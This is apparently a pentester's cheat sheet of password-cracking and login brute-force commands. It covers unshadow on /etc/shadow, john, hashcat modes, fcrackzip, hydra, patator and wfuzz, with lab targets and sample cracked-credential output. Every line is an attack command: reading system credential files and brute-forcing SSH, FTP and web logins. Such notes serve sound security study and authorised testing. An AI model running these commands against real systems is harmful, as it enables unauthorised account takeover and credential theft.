sudo unshadow /etc/passwd /etc/shadow > users # merges passwd and shadow into john's input format
sudo
john --format=zip hash.txt
# same for rar
john <file>
--wordlist=<file.txt>
john --show <file>
--format=
# raw-md5
# raw-sha1
ssh2john
zip2john file.zip > hash.txt
rm ./root/.john/john.pot
$ hashcat <options> <hashes_file> <wordlist>
# attack modes
-a0 # with wordlist
-a3 # brute force
-a3 ?a?a?a?a # four chars long, any char
# charsets: ?l ?u ?d ?h ?H ?s ?a ?b
# hash type
-m3200 # bcrypt
-m1800 # sha512crypt ($6$)
-m0 # md5
-m100 # sha1
-m1000 # NTLM (windows hashdump)
<https://hashcat.net/wiki/doku.php?id=example_hashes>
$ fcrackzip -b --method 2 -D -p /usr/share/wordlists/rockyou.txt -v ./file.zip
# -b = brute force
# --method 2 = zip
# -D = dictionary
# -v = verify
hydra
-l <username> # single username
-L <usernames.txt> # file of usernames
-p <password> # single password
-P <passwords.txt> # file of passwords
<ip>
-s <port>
http-post-form "/login:username=^USER^&password=^PASS^:invalid" # or :F=<failure string>; take the form field names from the browser's network tab (POST request/headers)
ssh
-V # verbose: shows each username/password attempt
-t 4 # 4 threads, recommended 1/core
$ nmap <ip> --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -vvv
https://github.com/lanjelot/patator
$ patator
# ftp enumeration
ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
[...]
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
# ssh enumeration
ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
[...]
17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out
# http brute force
http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
http_fuzz url="http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
[...]
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
wfuzz
-c # colour
-z file,<wordlist>.txt
-u <url>
-d "username=FUZZ&password=FUZZ"
# or
<url>api.php?username=FUZZ&password=FUZZ
/usr/share/wordlists
/usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt